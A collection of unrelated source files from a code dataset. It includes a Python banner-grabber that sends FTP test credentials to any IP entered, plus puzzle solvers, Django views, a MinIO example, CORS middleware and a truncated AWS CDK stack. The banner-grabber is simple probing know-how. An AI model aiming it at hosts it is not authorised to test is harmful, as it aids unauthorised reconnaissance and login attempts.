True\n\n\ndef get_ip():\n    while True:\n        ip = input(\"Enter the IP: \")\n        if is_valid_ipv4(ip):\n            return ip\n        else:\n            print(\"Invalid IP. Try again.\")\n\n\ndef get_service():\n    services = {\n        \"FTP\": 21,\n        \"SSH\": 22,\n        \"Telnet\": 23,\n        \"SMTP\": 25,\n        \"DNS\": 53,\n        \"HTTP\": 80,\n        \"POP3\": 110,\n        \"IMAP\": 143,\n        \"HTTPS\": 443\n    }\n    while True:\n        print(\"Choose one of the following services:\")\n        for service in services:\n            print(service)\n        chosen_service = input()\n        if chosen_service in services:\n            return services[chosen_service]\n        else:\n            print(\"Invalid service. Try again.\")\n\n\nip = get_ip()\nporta = get_service()\n\n# create the socket before the try block so the finally clause can always close it\nmeusocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n    meusocket.connect((ip, porta))\n\n    banner = meusocket.recv(1024)\n    print(\"Banner received:\", banner.decode())\n\n    print(\"Sending data to FTP Server - user\")\n    meusocket.send(b\"USER teste\\r\\n\")\n    banner = meusocket.recv(1024)\n    print(\"Banner received:\", banner.decode())\n\n    print(\"Sending data to FTP Server - password\")\n    meusocket.send(b\"PASS teste\\r\\n\")\n    banner = meusocket.recv(1024)\n    print(\"Banner received:\", banner.decode())\n\nexcept Exception as e:\n    print(\"Connection error:\", str(e))\n\nfinally:\n    meusocket.close()\n","repo_name":"BrenoSantanaBruno/My-Tools","sub_path":"Python3/tock_tock_services_protocols.py","file_name":"tock_tock_services_protocols.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"32504173439","text":"#!/usr/bin/env python3\nimport re\n\n\ninstr_rx = re.compile(r'(\\w+) can fly (\\d+) km/s for (\\d+) seconds, but then must rest for (\\d+) seconds.')\n\ndef parse_instr(text):\n    return [(n, *(int(x) for x in (a,b,c))) for n,a,b,c in instr_rx.findall(text)]\n\n\ndef travel(deer, t):\n    name,speed,active,snooze = deer\n    w = active + snooze\n    total = speed * (t // w) * active\n    r = min(active, t % w)\n    total += r * speed\n    return total\n\n\ndef solve(problem, t=2503):\n    board = parse_instr(problem)\n    return max(travel(x, t) for x in board)\n\n\ndef test():\n    assert parse_instr('Vixen can fly 19 km/s for 7 seconds, but then must rest for 124 seconds.') == [('Vixen', 19, 7, 124)]\n\n    assert travel(('A', 10, 10, 40), 0) == 0\n    assert travel(('A', 10, 10, 40), 1) == 10\n    assert travel(('A', 10, 10, 40), 10) == 100\n    assert travel(('A', 10, 10, 40), 50) == 100\n    assert travel(('A', 10, 10, 40), 51) == 110\n\n    problem = \"\"\"\nComet can fly 14 km/s for 10 seconds, but then must rest for 127 seconds.\nDancer can fly 16 km/s for 11 seconds, but then must rest for 162 seconds.\n\"\"\".strip()\n\n    assert solve(problem, 1000) == 1120\n\n\ndef getinput():\n    import fileinput\n    with fileinput.input() as f:\n        return ''.join(f).strip()\n\n\nif __name__ == '__main__':\n    test()\n    print(solve(getinput()))\n","repo_name":"paiv/aoc2015","sub_path":"code/14-1-reindeer/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"14196579430","text":"from django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils import simplejson\nfrom django.http import Http404\nfrom django.contrib.auth.models import User\nfrom django.views.decorators.cache import cache_page\nfrom django.template import RequestContext\nfrom game.models import Board, 
Score\nfrom contest.models import Contest\nfrom main.views import contests\nimport datetime\n\n@cache_page(60 * 5)\ndef highscores(request, contest):\n    try:\n        c = Contest.objects.get(id = contest)\n    except Contest.DoesNotExist:\n        raise Http404\n    if request.method == 'POST':\n        uname = request.user.username\n        bname = request.POST['boardname']\n        time = request.POST['time']\n        try:\n            u = User.objects.get(username=uname)\n        except User.DoesNotExist:\n            raise Http404\n        try:\n            b = Board.objects.get(name=bname)\n        except Board.DoesNotExist:\n            raise Http404\n        time_sec = int(time)\n\n        # check that the contest is still valid!\n        if(c.expiredate < datetime.date.today()):\n            return HttpResponse(simplejson.dumps(False), mimetype='application/json')\n\n        # 1. check whether this is the best score\n        try: \n            # invariant: there is only one old score (it is only changed here)\n            old = c.highscores.get(board = b)\n        except Score.DoesNotExist:\n            s = Score(user=u, board = b, time_s = time_sec, date = datetime.datetime.now())\n            s.save()\n            c.highscores.add(s)\n            return HttpResponse(simplejson.dumps(True), mimetype='application/json')\n        if (old.time_s > time_sec):\n            old.delete()\n            s = Score(user = u, board = b, time_s = time_sec, date = datetime.datetime.now())\n            s.save()\n            c.highscores.add(s)\n            return HttpResponse(simplejson.dumps(True), mimetype='application/json')\n        else:\n            return HttpResponse(simplejson.dumps(False), mimetype='application/json')\n    else: \n        scores = []\n        for s in c.highscores.order_by('time_s'):\n            scores.append((s.board.name, s.user, str(s.time_s) + 's'))\n\n        return render_to_response('highscores.html', \n            {'title': 'Best scores', 'scores': scores, 'contests':contests(request.user)}, context_instance=RequestContext(request)\n        )\n\n@login_required\ndef board(request, boardname):\n    xhr = request.GET.has_key('xhr')\n\n    try:\n        b = Board.objects.get(name=boardname)\n    except Board.DoesNotExist:\n        raise Http404\n\n    if xhr:\n        return HttpResponse(b.json(), mimetype='application/json')\n\n    return render_to_response('board.html', \n        {'title': 'Game'}, context_instance=RequestContext(request)\n\n    )\n\n@login_required\ndef boardlist(request, contest = 1):\n    option = request.GET.has_key('options')\n    if option:\n        try:\n            c = Contest.objects.get(id = contest)\n        except Contest.DoesNotExist:\n            raise Http404\n        boardsnames = []\n        for b in c.boards.all():\n            boardsnames.append(str(b))\n        return render_to_response('boardsoption.html', {'boardsnames': boardsnames})\n    return render_to_response('board.html',\n        {'title': 'Game', 'contest':contest, \n        'contests':contests(request.user)}, context_instance=RequestContext(request)\n        )\n","repo_name":"dobrypd/Numberlink","sub_path":"numberlink/game/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"}
{"seq_id":"32915471586","text":"with open(\"input.txt\") as f:\n    lines = f.read().split(\"\\n\")\n\nclass Position:\n    def __init__(self):\n        self.x=0\n        self.y=0\n    def dist(self, p2):\n        return max(abs(self.x-p2.x), abs(self.y-p2.y))\n    def follow(self, p2):\n        if self.dist(p2)>1:\n            if self.x < p2.x:\n                self.x += 1\n            elif self.x > p2.x:\n                self.x -= 1\n            if self.y < p2.y:\n                self.y += 1\n            elif self.y > p2.y:\n                self.y -= 1\n\ndef solver(n):\n    positions = [Position() for i in range(n)]\n    visited=set([(0,0)])\n    \n    for line in lines:\n        direction, count = line.split()\n        for _ in range(int(count)):\n            if direction in \"UD\":\n                m = 1 if direction==\"D\" else -1\n                positions[0].y+=m\n                for i in 
range(1,n):\n                    positions[i].follow(positions[i-1])\n\n            else:\n                m = 1 if direction==\"R\" else -1\n                positions[0].x+=m\n                for i in range(1,n):\n                    positions[i].follow(positions[i-1])\n            \n            visited.add((positions[-1].y,positions[-1].x))\n    return len(visited)\n    \nprint(f\"Part1: {solver(2)}\")\nprint(f\"Part2: {solver(10)}\")\n","repo_name":"muraterogl/Advent-Of-Code","sub_path":"2022/day09/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"28447462363","text":"# Using a plain Python list as a queue is very slow, so use the deque library\nfrom collections import deque\n\n# binary search library\nimport bisect\n\n# rotate 90 degrees clockwise\ndef rotate90(arr):\n    n = len(arr)\n    tmp = [ [0] * n for _ in range(n)]\n    for i in range(n):\n        for j in range(n):\n            tmp[i][j] = arr[n-1-j][i]\n    return tmp\n\n# shift the whole N x N array one cell to the left\ndef shift_array_to_left(arr):\n    n = len(arr)\n    for i in range(n):\n        for j in range(n):\n            if j+1 > n-1: continue\n            arr[i][j], arr[i][j+1] = arr[i][j+1], arr[i][j]\n\n# shift the whole N x N array one cell up\ndef shift_array_to_top(arr):\n    n = len(arr)\n    for i in range(n):\n        for j in range(n):\n            if i+1 > n-1: continue\n            arr[i][j], arr[i+1][j] = arr[i+1][j], arr[i][j]\n","repo_name":"yebrwe/Algorithm","sub_path":"library/algorithm/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"72356449233","text":"from miniopy_async import Minio\nfrom miniopy_async.commonconfig import DISABLED, ENABLED, AndOperator, Filter, Tags\nfrom miniopy_async.replicationconfig import (\n    DeleteMarkerReplication,\n    Destination,\n    ReplicationConfig,\n    Rule,\n)\nimport asyncio\n\nclient = Minio(\n    \"play.min.io\",\n    access_key=\"Q3AM3UQ867SPQQA43P2F\",\n    secret_key=\"zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG\",\n    secure=True,  # http for False, https for True\n)\n\nbucket_tags = Tags.new_bucket_tags()\nbucket_tags[\"Project\"] = \"Project One\"\nbucket_tags[\"User\"] = \"jsmith\"\n\nconfig = ReplicationConfig(\n    \"REPLACE-WITH-ACTUAL-ROLE\",\n    [\n        Rule(\n            Destination(\n                \"REPLACE-WITH-ACTUAL-DESTINATION-BUCKET-ARN\",\n            ),\n            ENABLED,\n            delete_marker_replication=DeleteMarkerReplication(\n                DISABLED,\n            ),\n            rule_filter=Filter(\n                AndOperator(\n                    \"TaxDocs\",\n                    bucket_tags,\n                ),\n            ),\n            rule_id=\"rule1\",\n            priority=1,\n        ),\n    ],\n)\n\n\nasync def main():\n    await client.set_bucket_replication(\"my-bucket\", config)\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\nloop.close()\n","repo_name":"hlf20010508/miniopy-async","sub_path":"examples/simple_examples/set_bucket_replication.py","file_name":"set_bucket_replication.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"84"}
{"seq_id":"16188876740","text":"import falcon\n\nfrom typing import Dict, Tuple, Type, Text, List\nfrom inspect import Parameter\n\nfrom ravel.app.middleware import Middleware\nfrom ravel.apps.web import Endpoint\nfrom ravel.app.base import ActionDecorator\nfrom ravel.ext.falcon.service import FalconService\nfrom ravel.ext.falcon.constants import HTTP_METHODS, HTTP_OPTIONS\n\nDEFAULT_ALLOW_ORIGIN = '*'\nDEFAULT_ALLOW_METHODS = HTTP_METHODS\nDEFAULT_ALLOW_HEADERS = (\n    'Authorization',\n    'Content-Type',\n    'Accept',\n    'Origin',\n    'User-Agent',\n    'DNT',\n    'Cache-Control',\n    'X-Mx-ReqToken',\n    'Keep-Alive',\n    'X-Requested-With',\n    
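A quick usage sketch for the rotate90 helper in the array.py record above; the sample matrix is illustrative, not part of the original file.

    grid = [[1, 2],
            [3, 4]]
    # clockwise rotation: the first column, read bottom-up, becomes the first row
    assert rotate90(grid) == [[3, 1],
                              [4, 2]]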
'If-Modified-Since',\n 'Pragma',\n 'Expires',\n)\n\n\nclass SetHttpCorsResponseHeaders(Middleware):\n \"\"\"\n # CORS Middleware\n\n This middleware sets various Access-Control headers needed for CORS.\n \"\"\"\n\n def __init__(\n self,\n allow_origin: Text = DEFAULT_ALLOW_ORIGIN,\n allow_headers: List[Text] = DEFAULT_ALLOW_HEADERS,\n allow_methods: List[Text] = DEFAULT_ALLOW_METHODS,\n ):\n self._allow_origin = allow_origin\n self._allow_headers = allow_headers\n self._allow_methods = allow_methods\n self._cors_headers = {\n 'Access-Control-Allow-Origin': self._allow_origin,\n 'Access-Control-Allow-Methods': ','.join(self._allow_methods),\n 'Access-Control-Allow-Headers': ','.join(self._allow_headers),\n }\n\n @property\n def app_types(self) -> Tuple[Type['Application']]:\n return (FalconService, )\n\n def on_bootstrap(self):\n \"\"\"\n Ensure that every registered route has at least a dummy endpoint\n registered for the OPTIONS HTTP method, adding endpoints as needed.\n \"\"\"\n for res in self.app.falcon_resources.values():\n if not res.is_method_supported(HTTP_OPTIONS):\n endpoint = Endpoint.from_function(\n app=self.app,\n func=lambda *args, **kwargs: None,\n method=HTTP_OPTIONS,\n route=res.route,\n )\n res.add_endpoint(endpoint)\n\n def pre_request(\n self,\n action: 'Action',\n request: 'Request',\n raw_args: Tuple,\n raw_kwargs: Dict\n ):\n \"\"\"\n Set CORS headers on OPTIONS requests as well as tell Falcon and Ravel\n to abort both further middleware processing and the target/respondor\n method, going right to post-request middleware instead.\n \"\"\"\n falcon_request, falcon_response = raw_args[:2]\n falcon_response.set_headers(self._cors_headers)","repo_name":"gigaquads/ravel","sub_path":"ravel/ext/falcon/middleware/set_http_cors_response_headers.py","file_name":"set_http_cors_response_headers.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"24561617409","text":"# PRD-01 Cloud6.Sentia1\n#\n# Project: MVP v1.1\n#\n### Importing the necessary libraries\n\nimport os.path\nimport aws_acm_certified as acm\nfrom urllib import response\nimport aws_cdk as cdk\nfrom aws_cdk import (\n Duration,\n aws_ec2 as ec2,\n aws_iam as iam,\n aws_backup as backup,\n aws_events as event,\n aws_kms as kms,\n aws_s3 as s3,\n aws_s3_deployment as s3deploy,\n aws_elasticloadbalancingv2 as elbv2,\n aws_elasticloadbalancingv2_targets as targets,\n aws_autoscaling as autoscaling,\n aws_ssm as ssm,\n RemovalPolicy,\n CfnOutput,\n App,\n Stack,\n Tags,\n)\nfrom cdk_iam_floyd import Autoscaling, Elasticloadbalancing, ElasticloadbalancingV2\nfrom constructs import Construct\nfrom cdk_ec2_key_pair import KeyPair\nfrom aws_cdk.aws_events import Schedule\nfrom aws_cdk.aws_s3_assets import Asset\nfrom aws_cdk.aws_certificatemanager import Certificate\nfrom aws_cdk.aws_elasticloadbalancingv2 import SslPolicy\n\n\n### directory variable\ndirname = os.path.dirname(__file__)\n\n\n#################### STACK ####################\n\n\nclass Mvpscript11Stack(Stack):\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n #################### Parameter Setup ####################\n\n # VPCs\n environments = self.node.try_get_context(\"ENVIRONMENTS\")\n vpcs_environment = environments.get(\"vpcs\")\n mngt_name = vpcs_environment.get(\"mngt_name\")\n mngt_cidr_block = vpcs_environment.get(\"mngt_cidr_block\")\n mngt_cidr_mask = 
vpcs_environment.get(\"mngt_cidr_mask\")\n mngt_subnet_name = vpcs_environment.get(\"mngt_subnet_name\")\n mngt_max_azs = vpcs_environment.get(\"mngt_max_azs\")\n\n asg_name = vpcs_environment.get(\"asg_name\")\n asg_cidr_block = vpcs_environment.get(\"asg_cidr_block\")\n asg_cidr_mask = vpcs_environment.get(\"asg_cidr_mask\")\n public_asg_subnet_name = vpcs_environment.get(\"public_asg_subnet_name\")\n private_asg_subnet_name = vpcs_environment.get(\"private_asg_subnet_name\")\n asg_max_azs = vpcs_environment.get(\"asg_max_azs\")\n\n vpcp_name = vpcs_environment.get(\"vpcp_name\")\n vpcp_region = vpcs_environment.get(\"vpcp_region\")\n\n # Roles\n roles_environment = environments.get(\"roles\")\n iam_ssm_role = roles_environment.get(\"iam_ssm_role\")\n iam_ssm_principal = roles_environment.get(\"iam_ssm_principal\")\n\n # Bucket\n bucket_environment = environments.get(\"bucket\")\n bucket_name = bucket_environment.get(\"bucket_name\")\n versioned = bucket_environment.get(\"versioned\")\n auto_delete_objects = bucket_environment.get(\"auto_delete_objects\")\n deployment_name = bucket_environment.get(\"deployment_name\")\n asset_bucket = bucket_environment.get(\"asset_bucket\")\n\n # Security Groups\n sgs_environment = environments.get(\"sgs\")\n mngt_sg_name = sgs_environment.get(\"mngt_sg_name\")\n mngt_sg_description = sgs_environment.get(\"mngt_sg_description\")\n mngt_sg_allow_all_outbound = sgs_environment.get(\"mngt_sg_allow_all_outbound\")\n mngt_trusted_ip_ssh = sgs_environment.get(\"mngt_trusted_ip_ssh\")\n mngt_trusted_ip_rdp = sgs_environment.get(\"mngt_trusted_ip_rdp\")\n mngt_sg_ssh_rule_port = sgs_environment.get(\"mngt_sg_ssh_rule_port\")\n mngt_sg_rdp_rule_port = sgs_environment.get(\"mngt_sg_rdp_rule_port\")\n\n asgsg_name = sgs_environment.get(\"asgsg_name\")\n asgsg_description = sgs_environment.get(\"asgsg_description\")\n asgsg_allow_all_outbound = sgs_environment.get(\"asgsg_allow_all_outbound\")\n asgsg_rule_port = sgs_environment.get(\"asgsg_rule_port\")\n asgsg_http_rule_port = sgs_environment.get(\"asgsg_http_rule_port\")\n asgsg_https_rule_port = sgs_environment.get(\"asgsg_https_rule_port\")\n asgsg_elb_port = sgs_environment.get(\"asgsg_elb_port\")\n\n elbsg_name = sgs_environment.get(\"elbsg_name\")\n elbsg_description = sgs_environment.get(\"elbsg_description\")\n elbsg_allow_all_outbound = sgs_environment.get(\"elbsg_allow_all_outbound\")\n elbsg_http_rule_port = sgs_environment.get(\"elbsg_http_rule_port\")\n elbsg_https_rule_port = sgs_environment.get(\"elbsg_https_rule_port\")\n\n # Key Pair\n keypair_environment = environments.get(\"keypair\")\n mngt_kp = keypair_environment.get(\"mngt_kp\")\n mngt_kp_name = keypair_environment.get(\"mngt_kp_name\")\n mngt_kp_description = keypair_environment.get(\"mngt_kp_description\")\n mngt_kp_store = keypair_environment.get(\"mngt_kp_store\")\n\n asg_kp = keypair_environment.get(\"asg_kp\")\n asg_kp_name = keypair_environment.get(\"asg_kp_name\")\n asg_kp_description = keypair_environment.get(\"asg_kp_description\")\n asg_kp_store = keypair_environment.get(\"asg_kp_store\")\n\n # LBS\n lbs_environment = environments.get(\"lbs\")\n lb_name = lbs_environment.get(\"lb_name\")\n lb_if = lbs_environment.get(\"lb_if\")\n list_name = lbs_environment.get(\"list_name\")\n target_group = lbs_environment.get(\"target_group\")\n\n # EC2s\n ec2s_environment = environments.get(\"ec2s\")\n mngt_ec2_name = ec2s_environment.get(\"mngt_ec2_name\")\n mngt_ec2_instance_type = ec2s_environment.get(\"mngt_ec2_instance_type\")\n 
mngt_ec2_encrypted = ec2s_environment.get(\"mngt_ec2_encrypted\")\n\n asg_ec2_name = ec2s_environment.get(\"asg_ec2_name\")\n asg_ec2_instance_type = ec2s_environment.get(\"asg_ec2_instance_type\")\n asg_ec2_encrypted = ec2s_environment.get(\"asg_ec2_encrypted\")\n asg_delete = ec2s_environment.get(\"asg_delete\")\n\n # Server Script\n webscript_environment = environments.get(\"webscript\")\n wsrv_asset_name = webscript_environment.get(\"wsrv_asset_name\")\n wsrv_asset_path = webscript_environment.get(\"wsrv_asset_path\")\n wsrv_asset_region = webscript_environment.get(\"wsrv_asset_region\")\n\n # Tags\n tags_environment = environments.get(\"tags\")\n mngt_tag_key = tags_environment.get(\"mngt_tag_key\")\n mngt_tag_value = tags_environment.get(\"mngt_tag_value\")\n asg_tag_key = tags_environment.get(\"asg_tag_key\")\n asg_tag_value = tags_environment.get(\"asg_tag_value\")\n\n # Backup Vaults/Plans/Rules\n bus_environment = environments.get(\"bus\")\n mngt_vault_key = bus_environment.get(\"mngt_vault_key\")\n mngt_vault_name = bus_environment.get(\"mngt_vault_name\")\n mngt_backup_vault_name = bus_environment.get(\"mngt_backup_vault_name\")\n mngt_backup_plan = bus_environment.get(\"mngt_backup_plan\")\n mngt_backup_plan_name = bus_environment.get(\"mngt_backup_plan_name\")\n mngt_rule_name = bus_environment.get(\"mngt_rule_name\")\n mngt_minute = bus_environment.get(\"mngt_minute\")\n mngt_hour = bus_environment.get(\"mngt_hour\")\n mngt_month = bus_environment.get(\"mngt_month\")\n mngt_weekday = bus_environment.get(\"mngt_weekday\")\n mngt_duration = bus_environment.get(\"mngt_duration\")\n\n asg_vault_key = bus_environment.get(\"asg_vault_key\")\n asg_vault_name = bus_environment.get(\"asg_vault_name\")\n asg_backup_vault_name = bus_environment.get(\"asg_backup_vault_name\")\n asg_backup_plan = bus_environment.get(\"asg_backup_plan\")\n asg_backup_plan_name = bus_environment.get(\"asg_backup_plan_name\")\n asg_backup_resource = bus_environment.get(\"asg_backup_resource\")\n asg_rule_name = bus_environment.get(\"asg_rule_name\")\n asg_minute = bus_environment.get(\"asg_minute\")\n asg_hour = bus_environment.get(\"asg_hour\")\n asg_month = bus_environment.get(\"asg_month\")\n asg_weekday = bus_environment.get(\"asg_weekday\")\n asg_duration = bus_environment.get(\"asg_duration\")\n\n #################### Create S3 Bucket ####################\n\n ### S3 bucket\n bootstrapbucket = s3.Bucket(\n self,\n bucket_name,\n versioned=versioned,\n encryption=s3.BucketEncryption.KMS,\n removal_policy=cdk.RemovalPolicy.DESTROY,\n auto_delete_objects=auto_delete_objects,\n )\n\n ### S3 Bucket file deployment.\n\n s3deploy.BucketDeployment(\n self,\n deployment_name,\n sources=[s3deploy.Source.asset(asset_bucket)],\n destination_bucket=bootstrapbucket,\n )\n\n #################### VPC's t.b.v. 
MNGT Server en Autoscaling ####################\n\n        ### VPC - Management VPC\n\n        self.vpc1 = ec2.Vpc(\n            self,\n            mngt_name,\n            max_azs=mngt_max_azs,\n            cidr=mngt_cidr_block,\n            subnet_configuration=[\n                ec2.SubnetConfiguration(\n                    subnet_type=ec2.SubnetType.PUBLIC,\n                    name=mngt_subnet_name,\n                    cidr_mask=mngt_cidr_mask,\n                )\n            ],\n        )\n\n        ### VPC - Autoscaling\n\n        self.vpc2 = ec2.Vpc(\n            self,\n            asg_name,\n            nat_gateway_subnets=ec2.SubnetSelection(\n                subnet_group_name=public_asg_subnet_name\n            ),\n            max_azs=asg_max_azs,\n            cidr=asg_cidr_block,\n            subnet_configuration=[\n                ec2.SubnetConfiguration(\n                    subnet_type=ec2.SubnetType.PUBLIC,\n                    name=public_asg_subnet_name,\n                    cidr_mask=asg_cidr_mask,\n                ),\n                ec2.SubnetConfiguration(\n                    subnet_type=ec2.SubnetType.PRIVATE_WITH_NAT,\n                    name=private_asg_subnet_name,\n                    cidr_mask=asg_cidr_mask,\n                ),\n            ],\n        )\n\n        ### VPC Peering\n\n        self.cfn_vPCPeering_connection = ec2.CfnVPCPeeringConnection(\n            self,\n            vpcp_name,\n            peer_vpc_id=self.vpc1.vpc_id,\n            vpc_id=self.vpc2.vpc_id,\n            # Peering Region (optional)\n            peer_region=vpcp_region,\n        )\n\n        ### VPC Peering Connection between VPC1-VPC2\n        # Routes: VPC1 public subnets -> VPC2 CIDR, VPC2 subnets -> VPC1 CIDR\n\n        for i in range(0, 2):\n            self.cfn_Route = ec2.CfnRoute(\n                self,\n                \"route_table_id\" + str(i),\n                route_table_id=self.vpc1.public_subnets[i].route_table.route_table_id,\n                destination_cidr_block=self.vpc2.vpc_cidr_block,\n                vpc_peering_connection_id=self.cfn_vPCPeering_connection.ref,\n            )\n\n        for j in range(0, 2):\n            self.cfn_Route = ec2.CfnRoute(\n                self,\n                \"route_table1_id\" + str(j),\n                route_table_id=self.vpc2.private_subnets[j].route_table.route_table_id,\n                destination_cidr_block=self.vpc1.vpc_cidr_block,\n                vpc_peering_connection_id=self.cfn_vPCPeering_connection.ref,\n            )\n\n        for k in range(0, 2):\n            self.cfn_Route = ec2.CfnRoute(\n                self,\n                \"route_table2_id\" + str(k),\n                route_table_id=self.vpc2.public_subnets[k].route_table.route_table_id,\n                destination_cidr_block=self.vpc1.vpc_cidr_block,\n                vpc_peering_connection_id=self.cfn_vPCPeering_connection.ref,\n            )\n\n        #################### Create AMI's ####################\n\n        ### AMI Linux\n        amzn_linux = ec2.MachineImage.latest_amazon_linux(\n            generation=ec2.AmazonLinuxGeneration.AMAZON_LINUX_2,\n            edition=ec2.AmazonLinuxEdition.STANDARD,\n            virtualization=ec2.AmazonLinuxVirt.HVM,\n            storage=ec2.AmazonLinuxStorage.GENERAL_PURPOSE,\n        )\n\n        ### AMI Windows\n        amzn_windows = ec2.MachineImage.latest_windows(\n            ec2.WindowsVersion.WINDOWS_SERVER_2019_ENGLISH_FULL_BASE\n        )\n\n        #################### Create Roles & Policies ####################\n\n        ### Role SSM\n\n        role = iam.Role(\n            self, iam_ssm_role, assumed_by=iam.ServicePrincipal(iam_ssm_principal)\n        )\n        role.add_managed_policy(\n            iam.ManagedPolicy.from_aws_managed_policy_name(\n                \"AmazonSSMManagedInstanceCore\"\n            )\n        )\n\n        #################### Create Security Groups ####################\n\n        ### Security Group Management Server\n        mngtsg = ec2.SecurityGroup(\n            self,\n            mngt_sg_name,\n            vpc=self.vpc1,\n            description=mngt_sg_description,\n            allow_all_outbound=mngt_sg_allow_all_outbound,\n        )\n        iplistssh = mngt_trusted_ip_ssh\n        for i in range(len(iplistssh)):\n            mngtsg.add_ingress_rule(\n                ec2.Peer.ipv4(iplistssh[i] + \"/32\"),\n                ec2.Port.tcp(mngt_sg_ssh_rule_port),\n                \"allow ssh access from the VPC\",\n            )\n\n        iplistrdp = mngt_trusted_ip_rdp\n        for i in range(len(iplistrdp)):\n            mngtsg.add_ingress_rule(\n                ec2.Peer.ipv4(iplistrdp[i] + \"/32\"),\n                ec2.Port.tcp(mngt_sg_rdp_rule_port),\n                \"allow RDP access from the VPC\",\n            )\n\n        ### Security Group ELB\n        elbsg = ec2.SecurityGroup(\n            self,\n            elbsg_name,\n            vpc=self.vpc2,\n            
description=elbsg_description,\n            allow_all_outbound=elbsg_allow_all_outbound,\n        )\n\n        elbsg.add_ingress_rule(\n            ec2.Peer.any_ipv4(),\n            ec2.Port.tcp(elbsg_http_rule_port),\n            \"allow HTTP traffic from anywhere\",\n        )\n\n        elbsg.add_ingress_rule(\n            ec2.Peer.any_ipv4(),\n            ec2.Port.tcp(elbsg_https_rule_port),\n            \"allow HTTPS traffic from anywhere\",\n        )\n\n        ### Security Group ASG\n        asgsg = ec2.SecurityGroup(\n            self,\n            asgsg_name,\n            vpc=self.vpc2,\n            description=asgsg_description,\n            allow_all_outbound=asgsg_allow_all_outbound,\n        )\n\n        asgsg.add_ingress_rule(\n            ec2.Peer.security_group_id(mngtsg.security_group_id),\n            ec2.Port.tcp(asgsg_rule_port),\n            \"allow access from the MNGT Security Group\",\n        )\n\n        asgsg.add_ingress_rule(\n            ec2.Peer.security_group_id(elbsg.security_group_id),\n            ec2.Port.tcp(asgsg_elb_port),\n            \"allow access from the ELB Security Group\",\n        )\n\n        asgsg.add_ingress_rule(\n            ec2.Peer.any_ipv4(),\n            ec2.Port.tcp(asgsg_http_rule_port),\n            \"allow HTTP traffic from anywhere\",\n        )\n\n        asgsg.add_ingress_rule(\n            ec2.Peer.any_ipv4(),\n            ec2.Port.tcp(asgsg_https_rule_port),\n            \"allow HTTPS traffic from anywhere\",\n        )\n\n        #################### Create Key Pair ####################\n\n        ### key pair Management Server\n        mngtkey = KeyPair(\n            self,\n            mngt_kp,\n            name=mngt_kp_name,\n            description=mngt_kp_description,\n            store_public_key=mngt_kp_store,\n        )\n\n        mngtkey.grant_read_on_private_key(role)\n        mngtkey.grant_read_on_public_key(role)\n\n        ### key pair webserver\n        asgkey = KeyPair(\n            self,\n            asg_kp,\n            name=asg_kp_name,\n            description=asg_kp_description,\n            store_public_key=asg_kp_store,\n        )\n\n        asgkey.grant_read_on_private_key(role)\n        asgkey.grant_read_on_public_key(role)\n\n        #################### Create EC2 Instances ####################\n\n        ### Instance Management Server (Windows)\n        management_server = ec2.Instance(\n            self,\n            mngt_ec2_name,\n            instance_type=ec2.InstanceType(mngt_ec2_instance_type),\n            machine_image=amzn_windows,\n            vpc=self.vpc1,\n            security_group=mngtsg,\n            key_name=mngtkey.key_pair_name,\n            block_devices=[\n                ec2.BlockDevice(\n                    device_name=\"/dev/sda1\",\n                    volume=ec2.BlockDeviceVolume.ebs(30, encrypted=mngt_ec2_encrypted),\n                )\n            ],\n        )\n\n        #################### Create Autoscaling ####################\n\n        asg = autoscaling.AutoScalingGroup(\n            self,\n            asg_ec2_name,\n            vpc=self.vpc2,\n            vpc_subnets=ec2.SubnetSelection(subnet_type=ec2.SubnetType.PUBLIC),\n            instance_type=ec2.InstanceType(asg_ec2_instance_type),\n            machine_image=amzn_linux,\n            key_name=asgkey.key_pair_name,\n            role=role,\n            security_group=asgsg,\n            desired_capacity=1,\n            max_capacity=3,\n            min_capacity=1,\n            block_devices=[\n                autoscaling.BlockDevice(\n                    device_name=\"/dev/xvda\",\n                    volume=autoscaling.BlockDeviceVolume.ebs(\n                        volume_size=8,\n                        encrypted=asg_ec2_encrypted,\n                        delete_on_termination=asg_delete,\n                    ),\n                )\n            ],\n        )\n\n        ### Launch script to install webserver\n\n        assets = Asset(\n            self,\n            wsrv_asset_name,\n            path=wsrv_asset_path,\n        )\n\n        Local_path = asg.user_data.add_s3_download_command(\n            bucket=assets.bucket,\n            bucket_key=assets.s3_object_key,\n            region=wsrv_asset_region,\n        )\n\n        asg.user_data.add_execute_file_command(file_path=Local_path)\n\n        assets.grant_read(asg.role)\n\n        #################### Create Tags ####################\n\n        Tags.of(management_server).add(mngt_tag_key, mngt_tag_value)\n        Tags.of(asg).add(asg_tag_key, asg_tag_value)\n\n        #################### Elastic Load Balancer ####################\n\n        ### Create the Load Balancer in the Webserver's VPC\n        lb = elbv2.ApplicationLoadBalancer(\n            self,\n            lb_name,\n            vpc=self.vpc2,\n            internet_facing=lb_if,\n            
